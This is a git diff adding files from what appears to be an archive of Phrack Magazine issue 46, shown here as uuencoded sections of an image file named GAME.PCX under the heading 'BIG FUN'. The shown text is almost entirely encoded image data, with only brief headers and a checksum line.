+M^<'QPL?.____T?^_S?_!Q<'_P?W!_\'[P?W!_\'XP__!_##![\'GP>`_P?\`#
+MP?`#P>`'P?C!_GC!_'A@P?_!X,'CP>?!_\'GC\',.'_!^<+PP?'!X\*/@P?!O
+MQS\XP?C!_\'#P>&?P>9_P?C!_,'QP?C!\<'CP?^/AS_!^#_!\<'\<<'_P>'!T
+M^,'CP?'!Q`!QP?_!X\'P+\'_P>!YP?_!^<'QP?#!X,'CSO___]__P<?&_\']I
+MQO_!]\'PPO_!X<'X<\'@?\'XP?[!^,'\P?A@P?_!\$?!Y\'_P>/!_\'>,,'_)
+MP?'!\,'AP?'!X\'`/\'#A\''P?YXP?#!_\+CG\'&?GC!^,'QP?#!\<'CP?'!=
+MW\''PO]_P?'!^''!_\'QP?#!X\'QP<1PP?'!_\'CP?A'P?\`><'_PO'!\,'`S
+M`\[____T_\'@P?_!^,'_P?W!_L'\<,'_P?A_PO_!\\+_P>#!_\'YP?AAP?'!0
+M\\'P?\'WP?_!Y\'^?'#!_\'P8\'@/G!X<,+PP_'!_\'GP?]_P?_"^'G!_\'Q5
+MP?#!\\'QP>1_P?#!^<'SP?_!X\'\<'G!_\'YP?'!^,'@P?/.____W__!S]3_\
+MP>?!_\'YQ/_!\,'_P?S#_\'SPO_!X<+_P?X#P?O!_\'P?\'_P=_!S\'_?`#!O
+M_\'@`\'`'X!\`,/QP>#!PY^'P@\?POAYP?_!\<'PP>/!\\'.?W#!^<'CP?_!'
+MX\'^?'G!_\'YP?'!^<'#S_____3_P<?!_\''P__"_M;_B,'_P?X?P<8?@\'^F
+M`L/_P?H/GX\/`A_!_@/!^\'_P?@#P<('CQXX$\'GPL?!_AX[P?_"^\'_P<_/R
+M____]/_!S\'_A\/_P?P/UO^<Q/]_PO\/P__!_@^?CP^$/\'^!\+_P?X'P<`/:
+MCPX^!\'GP<</P?\,'\3_PL_.____]/_![\'_P<_#_\'^!];_#]/_C\/_#\'O;
+M#X^'P?\'P>?!Y@_!_P8??\'_?\'_P<<'SO____O_#]7_P?P#U_^_P?^_C\'G>
+MP?^/P?_!_!_!_P<<?\'\?\'_P?`/SO______TO_!_`':_\'/RO_!_<+_P?@O#
+MSO______[O_!S]W______^W_P?Y_W?_________-_________\W_T/\_Q__!3
+MS______S_]#_/\?_P<______\__/_\'^/\?_P<_!_\']R/_!_G_!_\']SO^?O
+M_____];_S__!_'_'_\'OP?_!^<C_P?S!_\'YP?C,_\'^?[W_____UO_._\'@G
+MP?QX9\'PP?_!X\+_P?#!Y\'QP?#$_\']P__!^,'_P?C!_<S_P?Y^?,/_P?'![
+M_\'GPO_!^<7_P?[!]______&_\[_P>!\>&/!\'[!X<+_P?!OPO#!_L/_P?C#A
+M_\'XP?_!\,W_P?["?,/_P?'!_\'WPO_!^<7_P?[!]\7_P?[_____SO\#'#AAW
+MP<`<`,+_P>`'`'!X`\+_P<!\`<'\`'_!\'C!\`!?P?#"_\'#P?A_P?C!_\'X`
+MP?_!_'_#_\'SP?_!Y\+_P?G%_\'XP>/![\'_P?S"_\'\?____O_._P\>.$.&R
+M'AK"_\'"#P80?`/"_X(>`<'^`'_!\#[!\@(/P<)_P?\#P?(/P?X?P<9_P?X?/
+MP?^?P?^7P?^/PO_!^\7_P?[!Y\'?P?_!_L+_P?Y____^_\[_#XX_AP^>/G_!1
+M_\*/'AQ]P?O"_X\.#'P,?\'\/&`"!XX?P?X,P>`#P<(/AAX\#C\'P?P'P?^&U
+M'X?!_\'^#\*_P?_!_<'GP?_!S\'\?\'_GC_+_\'/RO_!Y___Y__._P^//X</0
+MGAY_P?_"CYX?POO"_X\.'G]^?\'_P?[!XX.'CQ_!_@_!X@/!QP>''CX./@?!.
+M]@?!_X8/A\'_P?X/GQ]_P?_!YX^'P?X_P?^.?X_!_Y_(_X_*_\'GQO\____@%
+M_\[_#XX\`1_!_`!_P?\/P<^`&,'@`<+_P?X,?''!_'_"_,'SP>/!YQ^?P?X_O
+MP?'!\,+''Y["/L(\8\''P?_"APP\P?`'CAY_P?'!YX\`,#_!_@!^`<'\!\'/1
+MP>^`!'^/P?^_C\C_P?S%_\'SPO\____@_\[_O\',>`&_P?@`PO^/P>_!X#C!_
+MX`#"_\'@/,'X<<'XP?_!\,'XP?'!X<'B'Y_!_#_!\<'PP</!XC_!_L)\>,'X[
+MPN'!_\'!P>8X>,+AP<X\?\'QP>&/`'!_P?@`?`#!\`/!Y\'C@"!_`<'P/X/!C
+M\,+_P>'$_\'XQ?_!\<+_/___X/_/_\'$<,'QO\'XP?'"_\'?P>8`>,'PP?'"@
+M_\'`.,'X<<'XP?_"\,+SP>(`'\'^`,'QP?#!P$)_P?["?'#!\&/!\<'_P<?!K
+MX'APP>/!\<',','_P?'!X<'./'#!_\'XP?!XPG#!\,'#P>/!P`!\8,'P1\'!V
+MP>!_P?Q`P?A_P?[!P,'P8<'SP?!_P>'!\,'X___B_\__P>QPP?'!_\'XP?O#N
+M_\'N<'C!\,'QPO_!X#C!^''!^,'_PO#"\\'B('_!_F#!\<'PP<!@?\'\PGS"U
+M<&/!\<'_P>?!X,)PP>/!\<'L.,'_P?'!X<'L/,'XP?_"^,)X<,'PPN/!\#!X<
+M<,'PPF/!X'_!_'#!\'_!_&#!\&'!\\'@?F#"\'___^'_SO^#'#'!X8>8?,+_!
+MP<_!QCPXP?'!^<+_'QQX<<'X?\+XPO/!XQG"_\'PP?'!^,'`?G_!_GY\<`#!5
+MP\'SP?_!S\'@`##!P\'QP<08P?_!X<'CP<\!P?C!_\'YP?QPP?YSP?O!Q\'CO
+MPI\8P?ACP>/"S\'_P?C">'_!_,)X<<'CP<`>$,'@P?!#P<Y____?_\[_!AXPN
+M`8\>/L+_CPX>&,'SP_\?''YQP?Q_POC"\\'G'\+_P?QSP?B/GA_!WCY^.`_!^
+MQ\'WP?^/P<8`.,'/P?/!S@S!_\'CP>>/`L'XP?_!^<'^><'^`\'_P<_!Q\(?;
+M&,'\9\''CP_!_\'\?GA_P?Q^/'W!QX>>'G/!\X>/?___W__._P8_/`&$'@?!$
+MY\'_P<8/`!P\!\'/P?\.#'X\"'_"_,/G#Q_!_CXCP?'"SQ\.PCX\P?_!Q\'W(
+MP?^/P<8?P?S!S\'CP<0-P?_"YX_!Q#S!_\'YP?XYP?X#P?^/P<?"'QP`9\''F
+MCX?!_\']P?X]P?_!_,'_/<'\9X^./WO!\\'_C___X/_._P<_/@?!QA\'P>?!M
+M_\'&#P8>/@?!S\'_!@Y^/@)_PO[#YP\?P?X>`X/"QP\.PS[!_P?!Q\'_CX8?Q
+MP?_!Q\'CP<6#P?_!Y\''C\'./\+_P?X[P?X'P?^/P<?"'QX&9\''CX<_PO\_H
+MP?_!_L'_/\'^1P\.?\'WP>.?C___X/_._P_"_[_"_X_!\\+_OX^_?@_!Q\'_=
+M@`S!_GX`?\'\/,+WP>>`'\'^`,'P`\'@!X0>/GP\','CA\'_AX8>.,''P</!#
+MX<'!P?_!X\'GCS\\P?_!^<'^.<'^(\'_PL?"'Q@/P>?!QX_!_!_!^<'^.<'_,
+MP?S!_SS!_&>`#'_!\\'T#X___^#_SO^_QO_!\\'_P?W%_\'GP?_!X<'MPOP@X
+MP?_!^'C"\\'WP>!_P?X`P?`!P>`'P<##?'@@P?!#P?^!AC!PP>'!X\+AP?_!\
+MX<'CCGPXP?_"^'G!_''!\<''P>._/SC!_\+CP<_!^#_!^<'^><'_P?C!_SC!`
+M_,'C@#C!_\'QP?@CP<___^#_U?_!\\?_P>?,_\'XPO_!\\'PP?_!\,'_P?#"F
+M_L+\0<'P8\'_P>!_P>#"\$/!\<'AP?_!\<'CP<XP>,'_P?AP>'#"\,'AP</!K
+M_[^XP?C!\\'CP<_!_X_!^,'\>,'_P?C!_'C!_,'AP=O!^,'^P?'!_\'CP<__G
+M_^#_U?_!\]3_P?G#_\'QP?_!_,'_P?C"_\'^P?_!\<'X<\'_P?!_P>#!^,'P$
+M?\'QP>'!_\'QP>/!_F!X?\'X<'APP?!AP>#!P\)^>,'XP?/!X\'OP?]_POAX1
+MP?_!^,'\>,'XP>/!_\'XP?S!\<'_P?/![___X/_N_\'QU?_!\<+_P<#!_'_!(
+M_@!^`<'X`\'@`\'?/SP!P?/!X\'#P<`_P?QP>,'_P?S"<'C!X\''G'AQPO/!U
+MS___X/_N_\'SU?_!^<+_P<_!_W_!_P_!_P?!_P_!\`^?'QX#P>?!Q\'#@!_!2
+M_@#!^<'_P?X`>!/!QX<>',+SP<./___@____Q?_!_G_/_X_"_\+/?\'_#\/_N
+M!\'^!\'GP<0?!\'\?`^//___W____\;_?\__P=_&_X_#_X_!_P_"YQ^'PO["_
+M#S___]_____D_\'GQ?^_'___X/___^3_P>/&_S___^#____D_\'C___G____5
+MY/_!]\;_?___X/_________-_________\W_________S?_________-____U
+
+sum -r/size 20457/59873 section (from "begin" to last encoded line)
+
diff --git a/phrack46/7.txt b/phrack46/7.txt
new file mode 100644
index 0000000..ee11d2c
--- /dev/null
+++ b/phrack46/7.txt
@@ -0,0 +1,707 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 7 of 28
+
+****************************************************************************
+
+                                BIG FUN
+                                (cont)
+
+
+section 2 of uuencode 4.13 of file GAME.PCX    by R.E.M.
+
+M_____\W_________S?_________-_________\W_________S?_________-R
+M_________\W_________S?_________-_________\W_________S?______D
+M___-_________\W_________S?_________-_________\W_________S?__R
+M_______-_________\W_________S?_________-_________\W_________>
+MS?_________-_________\W_________S?_________-_________\W_____R
+M____S?_________-_________\W_________S?_________-_________\W_R
+M________S?_________-_________\W_________S?_________-________]
+M_\W_________S?_________-_________\W_________S?_________-____R
+M_____\W_________S?_________-_________\W_________S?_________-R
+M_________\W_________S?_________-_________\W_________S?______D
+M___-_________\W_________S?_________-_________\W_________S?__R
+M_______-_________\W_________S?_________-_________\W_________>
+MS?_________-_________\W_________S?_________-_________\W_____R
+M____S?_________-_________\W_________S?_________-_________\W_R
+M________S?_________-_________\W_________S?_________-________]
+M_\W_________S?_________-_________\W_________S?_________-____R
+M_____\W_________S?_________-_________\W_________S?_________-R
+M_________\W_________S?_________-_________\W_________S?______D
+M___-_________\W_________S?_________-_________\W_________S?__R
+M_______-_________\W_________S?_________-_________\W_________>
+MS?_________-_\W_P?S!\<'SP?_!^______Z_\W_P?QPP?#!^,'PP?G!^,'[5
+M___)_\']___M_\W_P?S"0,L`0&!QPOO_____[/_._Q^.P@;"`L0``L(``@`"/
+M!@<>#AX.'A^?O\'?P?_!W______A_]3_O\'_G\'_P=_%#PX&PP[#!@0&#L,&\
+M!\(&#@<.!L</'Y\?G______._]G_P=_"_\'?PH_&#\,'!L('!@?(!@<&!P;#0
+M!\,/PH^?C______)_^[_OX^?P?^_G\0/!@0`!L(`!,0`!``$P@8$!L('G\*_8
+M___\__C_P?W!\<'PP?W!\,'@8,'@QR``(,,`PB!@P>'!\<'APOG___?_SO_!_
+M\\3_P?'R_\'QQO#$8$#$8,'@P?#!X,;PP_'!^?__Z/_-_\'\<<'_P?G!_'?!\
+M\/C_P?C#\,)P8'#+8,-PQ/#!^,+YP?C!^<+_P?W__]W_S?_!_&'!_\+X0X#^W
+M_\+[P?G!\,'[P?#!X,'PPF##0,D`0,(`0&#!P$!@<<'QP?#!^<'[___6_\W_B
+MP?[!\Y_"^`<?___'_\'?P?_#WY_"'\(.P@;"`LD`Q`('!@?"#Q___]#_S?_![
+M_G\?P>Q_P?\?___4_\*/Q`_##L0&Q03$!@[&#Q_"#\(?#\*?PO_!W_O_S?_!8
+M_K<?P>=GP?\?___9_X_!W\./Q`_$!\(&!\(&!P8'Q`;#!P;#!\</PH_"_\'/(
+M\O_-_\'\!S_!YG/!_P?__^?_O\+_G\(/CP8.PP3"``8$RP#"!``//P\?GQ^?`
+MP?^/Z?_-_\'\`[_!X''!_X'___#_P?W!Y<'YPO'!_\+QP?##X&#%(,0`QB!@K
+MPB!QP>#!^<'PP?'"_\+]W__-_\'\PO_!X''!^\'S_____\+_P?G!\,'_P?')!
+M\,'@Q6#"0&!`Q&!PQO#"^=+_S?_!_,+_P>!PP?'_____T?_!_<'YP?W!^<'X)
+MPO#"<,'P<,9@<,1@PG#!\,'SSO_-_\'\P?\_P<!PP?$______];_P?O!^<'[,
+MP?C!\,'SP?!@PD``8$#&``/._\W_P?[!_P(?G@<&?___\/_!S\'_'\+_'Y_N,
+M_Y\?#\[_S_\&'YX/!G____#_P<_!_@_!_\'F'P_$_Q_!_P_X_\__P=_"_Y^/<
+M___Q_\'/P?X'P>_!YAX/P?_"'SX/P?X/P>?!]\'''_3______\;_P<_!_:?!&
+MX<'\/#_!_\(?.`?!_`S!X\'SP<0_]/______QO_![\'YP?'!X,+\PO\?#WG!0
+MY\'\?,+AP>?U_______'_\'YP?'!X,'\P?C!_\'^7H;!\<'SP?Y\P?'!X?;_V
+M_____\?_POC!X,'\P?A_P?S!]C!YP?'!_GS!\,'@P?#U_______'_\+YP>#!C
+M_,'X#\'\P<<P><'SP?]\P>#!P<'`?_3______\;_P<_!_<'Y@'[!_!_!_@<8C
+M.\+_/D0#P<)_]/______QO^/P?W!_X`^PO_!_`<<.\'OP?\^#@^/?_3_____8
+M_\;_C\'_AX\_P?^?P?X''A_!Q\'_/@8/C_7______\;_P=_!_`>?/L'\G\']P
+MP><^.8?!_S[![A./]?______Q__!^"?!_\']P?PCP?G!\<'^>"?!_WS!]SG!R
+MX/7______\?_P?S#_\'\P?/"^\'^P?A_P?_!_,'_P?G!X'_T_______6_\'X5
+M]?_________-_______&_\'?___&_______&_X___\;______\;_P<___\;_\
+M_____\;_P=___\;_________S?_________-_________\W_________S?__P
+M____QO_!W___QO______QO_!W___QO______QO_!S___QO______QO_!W___6
+MQO_________-_________\W_________S?_________-_______&_\'?___&^
+M_______&_Y___\;______\;_C___QO______QO_!W___QO_________-____)
+M_____\W_________S?_________-_______&_\'?___&_______&_X___\;_G
+M_____\;_G___QO______QO_!W___QO_________-_________\W_________H
+MS?______QO_!W___QO______QO^?___&_______&_Y___\;______\;_G___Y
+MQO______QO^?___&_________\W_________S?_________-_______&_\'?Q
+M___&_______&_Y___\;______\;_G___QO______QO^?___&_______&_Y__1
+M_\;_________S?_________-_________\W______\;_P=___\;______\;_.
+MG___QO______QO^?___&_______&_Y___\;______\;_G___QO_________-A
+M_________\W_________S?______QO_!W___QO______QO^?___&_______&:
+M_Y___\;______\;_G___QO______QO^?___&_________\W_________S?__+
+M_______-_______&_\'?___&_______&_Y___\;______\;_G___QO______"
+MQO^?___&_______&_Y___\;_________S?_________-_________\W_____]
+M_\;_P=___\;______\;_G___QO______QO^?___&_______&_Y___\;_____*
+M_\;_G___QO_________-_________\W_________S?______QO_!W___QO__\
+M____QO^?___&_\[_P@\?G___\_^?___&_\[_#P?##\*/OY^____M_Y___\;_7
+MS?_!_@;"!`##!,,`Q00&PP^/Q+___]__G___QO_-_\']P>'!\<'PQ6#,(&#"#
+MX,'QPOG#\<+_POW_____W?_;_\'YP?O!\<?PQ.#!\,'@RF#"X,-@P^##\,'Q]
+MP?#!^,'QP?#!\?_____&_]O_P?W#_\']P?C!_,+XP_#!\<'PP?C"\'#!\,5P!
+MPF!PQV#$<,;PP?C!_\']_____\+_^/_!^\'YPOC!\<'YP_!@Q4#%`,5`8,'P6
+MP?G___?__/_!W\+_PM^?PA\>#L(&`@##`@`"`,,"!A^?P=\?G^O_G___QO__<
+M_\S_P=_"_Y^_GQ\/#@;##L4&!\</PA^?P?^_VO^?___&____T_^_C\0/Q`<&!
+M!\(&!P;#!\4/C\+?O];_G___QO___]__O\'_OY\/'X8$#L0`!``$P@8'P@_"(
+MG\._S/^?___&____Y?_!_<'YP?S#8,L@Q&##\<'YP?W__\W____P_\+PP?'![
+M^<7PP>#"8$!@0,9@`,)@<,+@QO#!^<'PP?'!^_;____T_\'YP_C#\,1PS&#"Y
+M<&#$<,3PPOC!\,'XP?GP_______#_\/[P?_!^\/YP?O!^,'P<,'@PF!``$#*-
+M`,)`PV#!\,/YY/______T/_"WY["'P[#!@(&S0(&PP\?G\+_P=_;_______?>
+M_\.?'\0/#LH&R0\?G\_______^;_CY_%#\8'!L@'#Q_._______S_\./!\(&:
+MP@3"``_._______Y_\']P?G!X<'PS__________-_________\W_________\
+MS?_________-_________\W_________S?_________-_________\W_SO_#:
+M\/_____[_\[_P?!@<'______^O_._\'@P?#!X$?_____^O_._\'/PM^'____Q
+M__K_SO_!S\+_P>______^O_._\'/PO_!Y______Z_\[_P<_"_\'G______K_Q
+MSO_![\+_P>?_____^O_._\'OPO_!X______Z_]'_P?/$_\']______7_SO_!6
+M[\+_P>?$_\'\?______T_\[_P<_"_\'GPO_!S\'ZP?X#P?[!_Q_!_\'WP?\&&
+M'XX/P?_!_@_!_Q______Y?_._\'/PO_![\+_P<_!]L'\!\+_'\'_P<?!_P0?&
+M!@_!_\'^!\'^#\'_/\/_C\3_/P_!_\'?O______6_\[_P<_"_\'GPO_"Y\''?
+MCC_!_Q_!_X?!_\(/!P_!_\''!\'^!C\/PN?!_X?!_A_!Q\'_'@8?A@>'#___V
+M___4_\[_P<_"_\'GPO_"X\'#P?PXP?\?P?^#P?X?P@\?P?_!P8'!\`0^'\'AP
+MP>#!_X?!_#_!P\'^/@`?@`>`!\S_P>______Q__._\'OPO_!Y\+_P?#"X\'\V
+M>,'_O\'_P>#!_#_!YP_"_\'CP?C!X<'\/`_!X<'@P?^'P?`_P>#!_SQ]CX#!+
+M_\'`P>'!_\'QRO_!X\+_P>?_____Q/_._\'OPO_!Y\+_P?#"X\'\<,/_P<#!_
+M_'_!X\/_P<?!^,'AP?P\'\'AP?#!_X?!\#_!X,'^>'_!Y\''P?_!P\'QP?_!H
+M\<K_P?/!]\'_P>?1_\'S___Q_]'_P??"_\'X;\'OP?YXP__!\,'\?\'CQ?_!)
+MX\'_?"_!X,'P?B?!\#_!X'QX?\'GPO_![\'PP?_!\,'XPO_!^,'_P?O%_\'GE
+MT__!\\+_P??$_\'WP?_!_,'YQ/_!^___X?_._\'OPO_!Y\+_P?@/P<_!_SC!(
+M_W_!_YC!_C_!SPO"_Y_!_\'#P?\<#\'!P?!^!\'P#\'@?#Q_P>>/P?_!S\'P=
+MP?_!X,'X?\'_P>!_P>'!_<'XP?O"_\''R_\?Q__!P\+_P<?$_P_!_\'\P?G$"
+M_\'S___A_\[_P<_"_\'GPO_!_A_!S\'_&,'_'\'_'CX"#P(?P?\?P?_!Q\'_]
+M#@>!P>`>!\'SC\'"PAY_P>>/P?_!S\'\P?_!P,'X!\'_@!\`P?S"``?!QX?!I
+M_\'/DC\'P?X'P?X/P?X?#\'_P=_%_\'/P?_"C\3_'\'_P?YYQ/_!]___X?_.U
+M_\'/PO_![\+_P?X?C\'_&<'_'\'_'CX$#P`/P?\/P?_!S\'_#@>!P>(>!\'WD
+M#\'''CX_P>>''X_!_,'_P</!YP?!_X</#'S"``>'!\'_CP`_!\'\!\'^#\',%
+M'P^?C\'_C\+_/X_!_\*/Q/\?P?_!_F_1_\'/___4_\[_P<_"_\'GP_\?C\'_8
+M'\'_'\'_#C[##Q_!_P_!_\''P?\.!PO!YQY'P<>/P<>/'C_!QX8/P<_!_L'_O
+MP??"Y\'_AX\>/C]KP>_!QX?!_X\'#PY^#G\'P<</!Q\&?@?!_\'V#P?!_\*'!
+M'\'/PO\/P<_!_GO1_\''RO^_/\__O_?_SO_!S\+_P>?#_S_!S\'_.,'_/\'^3
+M`#[##\+_'\'_P<?!_PXC&<'C'&?!QX?!QXX^?\'G@`_!S\'\P?_!]\'GP?'!2
+M_X_!SCXPP_G!QX_!_X\/'CQ\''&#A\(/'@1X`\'_P?`/!\'_AX`?@'_!_`^%-
+MP?QQP?\_S__![\C_O\'_PC_/_S_W_\[_P>_"_\'GP_\_P>/!_#C!_C_!_``\X
+M/\'/O\+_C\'\P>/!_PQP.<'AB,'CP<`#P>/!X#Q_P>.'P?_!S\'XP?_!\<'G=
+MP?'!_\'GP>`@,,/YP>/!Y\'_P<._/#W!^,'\8<'QP<?![[^<?'C!\<'_P>'!]
+MX\'#P?_!P\'`AX`_P?P/`'AQP>`/PGS!\\'@?\'@PO_!X<__?\'_PC_$_\'QC
+MRO\_P?_!_G_-_\'QYO_1_\'WPO_!_G_!X\'X>,'^?\'X8#Q_P>_#_\'7P?C!I
+MX\'_/'!YP?'!P,'CP<`#P>/!X#A_P>/!W\'_P<?!^,'_P?/!Y\'QPO_!X`!PV
+MP_'!X\+_P</!_\'\<<'XP?Q@P?'!S\+_P?C!_G#!\,'_P>/!\\''P?_!Y\'!1
+MP>>P?\'\/G!XP?'!X,''PGS!\\'`/\'@?\'^8,'XP>S!X\+PPO?!\,'_P?/#P
+M_\'XP?Y_P?_"?\3_P?'*_W_!_,'^S?_!Y\'AP>?"_\'^P?_!^>#_SO_!\,'Y9
+MP?_!]\+_P?Y_PO#!^'A_P?A_?'_!Y\/_P>/!^,'QP?Q\<'C!\<'@P>/!X''!`
+MX\'P/'_!X\+_P>?!^,'_P?'!Y\'YPO_!X'#!^,'YP?C!^<'CPO_!X\'_P?Y@M
+MP?C!_L)@P__!^,'^>,'XP?_!Y\'QP>_!_\'WP>?!YG_"_SQ^>''"X<)XP?'![
+MX,'WP>`_P?XPP?AX<,'P8&'!X\'@?\'@P?AWP?_!\'@_P?P^<,'^P?/!_\'XK
+MP?'!^'Y[P?#"_\'WP?S!_\'X?\'\?\W_P?/!X</_P?Q_P?C@_\[_P<!@<<'GC
+MPO_!_C_!\&#!^'!_P?A_#'_!QP_"_\'!P?#!\<'\/'!YP?'!P<'CC\'SP>/!L
+M\#Q_P<>/P?_!Q\'PP?_!\\'GP?'!_\'/P<1_P?C#^<'CP<_!_\'#/Q_!P'C!Y
+M_F`!P<_!_\'?&,'^.<'XP?_!S\'SP<_!_\+'P>8?/\'_'G\8<<''P>'".,'SM
+MP</!QYX?P?XX<'APP>!`0<'CP<`^`,'P!\'_P>`8#\'\#P!^`<'_P?@!P?`<<
+M`\'@P?_!_@/!\'_!X#_!^'_!_\'[S/_!P\/_P?Q_P?##_Y_<_\[_P<X&`@_#E
+M_S_!_@/!_@!_P?[!_XX_P<<"#\'_P<`#P?@8/CQ[P>/!P\'GC\'SP<?!_,(>*
+M#X_!_\''P=/!_\'SP>?!\\'_P<?!SC_!_,'_P?G!^\''C\'_P<<?#\'^?,'^T
+M(\'?C\'_GQY_&<'XP?_!S\'SP<_!_\''C\'&`A_!_QY_'GF/P>/"','SPH\?$
+MG\'^/SA\P?S!X\'AP?/!QX_"'G"'P?_!QPX?P?\/!CX#P?_!\`/!X@8'@C_![
+M_@/!P`\`'\'\'GX"!\'^'\'_P?(_CW^/P?\?P?_!Q\/_P?Y_P?K#_Y_<_\__5
+MP@\?P_\_P?\/P?\'P_^//\'/``_!_\'N!\'^`GX\?\'GP<?!YP_!_\''P?X^7
+M#A^'#X<'P?_!]\'GP<?!_X>/'S_#_\''C\'_P<\?#\'^/'XGP?^/P<\/'G\?3
+MP?W!_X_!]X_!_\*/P<8&'\'_'G\>>X_!XPP?P<?"CQ^?P?X_','\/&?!X\'OH
+MP<>/'CXSPO_!SX\?P?\?#SP-P?_!XP?!QX?"#Q_!_@F'#PP?P?P>?``'P?0/D
+MP?_!Q!\&'P?!_@_!SP?!S\''P?\.?\'_C\+_']S_U_^?P?_!S\/_P=_!_\'/-
+MCP_"_P_!_P?$_\'GP>^?P?_!Q\'_/@<?@@>&#\'_P??!YP_!_X</#G_#_\'G-
+MA\'_P<<?#Q["/F?!_\*/#QX_'\+_P<_!YX_!_\*/P<<?PO\?/QY[C\'GC@/!B
+MQ\*/'Y_!_S\>P?P&9\'GP>_!QX?!_@XW'\+_CQ_!_\,?P?]_P<?!Y\'_AX\/<
+M'\+_AX_"'\'^'CX"#\''!\'_AP\&'P=^!\''!\'/AC\&/\'^!\'_#X^'V__D7
+M_[_!_[_*_SX%P?^`!\'`#\'_P?#!^`_!_X`?`,+]P?G!_\'GP<?!_\'''PX,-
+M?!QQ@\''CP\>/CG!_<'_PL>/P?_"C\''/\+_'C\<<8_!XX`#P>>/CA^?P?Y_[
+M','P`,'GP?/!\<'G@+P$-`_"_P\_P?_"/SC!_'_!Q\'CP?^''P\?P?_!^8>.*
+MPC_!_C[">,'YP>?!Q\'_C\(/'AQX`\''A\''!#X`?\'\`\'T#Q\`P?_!Y\'OT
+MV/_T_\']P?_!_<+_P?G!_,+_P>#!_\'APOW#_\'CP?_!Y\+_`,'X`,'X`\'@Q
+M+\'''B#"^<'_P>'!X\'OP?_!Y\''P>>_PO\_/CAQP>?!X<+!P?/!S\'F/Y_!/
+M_G\XP?#!\<'APO'!X\'P.`!X`\'_P>`'?\'_/W\P('_!Y\'QP?`#O``_P?[!W
+MX,'GP>Q_/\'\?'C"^,'AP>/!_\'#P?X_B'AQP?'"X\'B/SAX?\'P<,'@P>.<(
+M,'G!X<'CV/_]_\'CQ__!\\3_P>#!^&'!^&/!\'_!X\'^P>#"^<'_P?!'P>_!?
+M_\/GP?!_P?]_?'C!\<'AP>/"P<'SP<_!YL'_P=_!_GYXP?#!^\/QP>/!_#C!F
+M\,']P>'!_\'@!G_!_\)_<$#!_\'CP?'!\$/!_`!_P?@`P>?!Y,'_?\'\PGC"@
+M^,'@P>'!_\'@P?Y_P<!P<<'QP>/!Y\'B?L+X?\'PP?C!X<'CP?S">,'AP>/8U
+M____R__!^<'XP?O"_\'XP__!\<+YP?_!\'_"_\'SP?_!]\'@?\'_?\'P>''!B
+M\,'GP>'!X\'SP>_!Y\'^O\'^?'C!\,'XP_'!X\'_P?C!_\'[P?'!_\'@P>9_#
+MP?_"?W#!\<'_P>/!\<'@P>/!_##!_\'X<,'GP>S!_W_!_'QXPOC!X&'!_\'P[
+M?G_!X'!SP?_!X\'GP>+",,'\?\+XP>'!\<'X?GC!X-G__?_!S\W_P?C+_\'\^
+MP__!]\+_P>##_\'`P?C!\<'P!\+#P?/!S\''@!_!_CAXPOC!X\+QP>.?G,'^S
+MP?/!\<'_AXY_P?\_?S#"_\'CP?'"P\'^/\'_POC![\',?S_!_'QYPOC!P'/!'
+M_\'P/C^``&/!_\'#P<_!Q@`0P?Q_P?C!_$#!XYA^.,'@P<_8__W_P=_-_\'^D
+MUO_!W\+_P?X?P<?!S\'WPL^"'\'^`'S!_`+!Y\+SP<>/PAYSP?/!_X\/'\'_=
+M'S\<PO_!Q\'SA\'#GQ^_P?W!^,'/P<["/\'^/GG!^<'XP<?#_PX?@!_!Y\'_;
+MP<?!S\'.`AG!_G_!_,'^``,>?QX`P<_8____Y_\_P__"WX8?P?X'P?_!_@?!E
+M[\+_P<>.'@Q_!\'_A@\?P?\?/SP?P?_!QX>/!\(/'\']:<*//C_!_CY_POW!<
+MS\+_P=\/'XP_P>?!_\+/C@\=P?Y_P?_!_@(/'G\>!0_8____[?_"G\'_'\+_G
+MC\/_P>_!SS\'P?\/P?_!Q@</P?\//SX'P?_![@?!Q@>/AC_!_@</CPX_P?\>M
+M?\+_P<>'P?^/P@\.'R?"Q\'/CQ^?P?Y_P?_!_@>?#G\>#@_8____[?^?'\'^%
+M/]'_P=_"_X_!_\'^'\'_/\'?P>3!_\'^#\'_P<^`/\'_'GW"_<'P!\'_P<8/"
+M!!X`>`/!Q\+/#QQ\?\+\1\'WGCX>#A_8____[?^`?\'^?];_P?W$_\'YQ?_!7
+MX<+_P?[#^<'P+\'_P>`^`'X`P?@#P>/!Y\'O@#AP?\+PP>'!X[S"?!P_V/__I
+M_^W_P>#K_\'\PO_!\,'^,,'_P?'!^'?!]\+_P>#!_D#!_\'P8,'PP>/!_L'`,
+M?L)\V/___^W_P?#O_\'^?<+_P?S$_\'PP?[!\,'_P?AAP?!_P?[!X,'^PGQ_8
+MU_______WO_!_G_0_\'SV__._\/?_____\W_P?X?[/_-_\'NQ@;##L8/PO^?#
+M___^_S_L_\W_P>\/!\@&!\(&P@?%#\2/O______E_]3_GX\_P?_"CQ\/C,($$
+M`,,$``3%`,($!L($Q08'#Y^/G[_!_[_!_[______SO_<_\'YP?'!X<'@P>'!>
+MX,)@P>!@T2!@(&'!X,)@<</QP?G!_\']_____\C_Z/_!^</_P?G!_\/YQ_#!L
+MX,'P8,'PP>!@P>#)8,+@R/#!\<'S___W__3_P?G#^,'PP?C!\,'XQ/!PP?#%%
+M<,9@<,)@PG#!\'#"\,'XP?G!^___\O_-_\'X^O_!^\/YP?'!^,+P8,-`Q0#"!
+M0&#"0,-@<,'QP_O__^7_S?_!_A^?___!W\*?'Q[&`@#'`L(&#@_!W___Y/_-E
+M_\'^#@_!QC_!_\'/#X8^'___PO_!WY_!_\*?PA_"#\,.Q08.QP\?/Y___];_Z
+MSO\'#\''9\'_P<X'AR<?___+_\*/P@_$!P;&!P\'Q`_"C\+?O___S__._\'FI
+M?L'/P?'!X<'.?X_!YY___]3_PH^?PH_"!\(&P@3$``0`Q`3"!@</#@</'P\'@
+M#[^?OY^_^O_-_\'QP>#!_,'OP?#!X<'L>\'_P>/__]S_P?G!\<'XPN#"(`##"
+M(,<`(,(`PB#"`,(@8"#"8,'PP?'!^<+]]/_-_\'PP>!@P>#!\,'@P>9WP<'!V
+M\/__Y?_"^<?P8,+PP>#!\,'@P?#"8,'@8,'@8,)`8$#&8,+@Q/#!^<']Y__-<
+M_\'P?&#!X'#!X,'^<\'@P?#__^O_P?O!^,'ZP?C!^<3XPO#!^,7PPW#*8,-P-
+MQ?#"^,+YW__-_\'PP?QXP>/!\$#![\'AP<#!^!______PO_$^\'XP?#"^,+P-
+M<,D`PD!@P>#!\,'YP?'!^\'_P?O4_\W_P?O!_C[!S\'V"<'/P<./P?\/___M?
